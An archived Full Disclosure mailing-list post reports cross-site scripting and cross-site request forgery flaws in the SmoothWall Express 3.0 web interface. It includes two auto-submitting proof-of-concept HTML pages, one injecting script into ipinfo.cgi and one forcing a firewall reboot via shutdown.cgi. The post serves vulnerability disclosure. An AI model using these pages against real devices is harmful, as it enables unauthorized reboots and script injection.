Full Disclosure mailing list archives
SmoothWall Express 3.0 csrf / xss
From: dave b <db.pub.mail () gmail com>
Date: Sun, 16 Jan 2011 21:18:00 +1100
The web management interface of SmoothWall Express 3.0 is vulnerable to xss and csrf. xss example: <html> <title> SmoothWall Express 3.0 xss </title> <body> <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi" method="post" id="xssplz"> <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input> <input type="hidden" name="ACTION" value='Run'></input> </form> <script>document.getElementById("xssplz").submit();</script> </body> csrf example: <html> <title> SmoothWall Express 3.0 csrf </title> <body> <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi" method="post" id="csrfplz"> <input type="hidden" name="ACTION" value='Reboot'></input> </form> <script>document.getElementById("csrfplz").submit();</script> </body> -- Something's rotten in the state of Denmark. -- Shakespeare _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SmoothWall Express 3.0 csrf / xss dave b (Jan 16)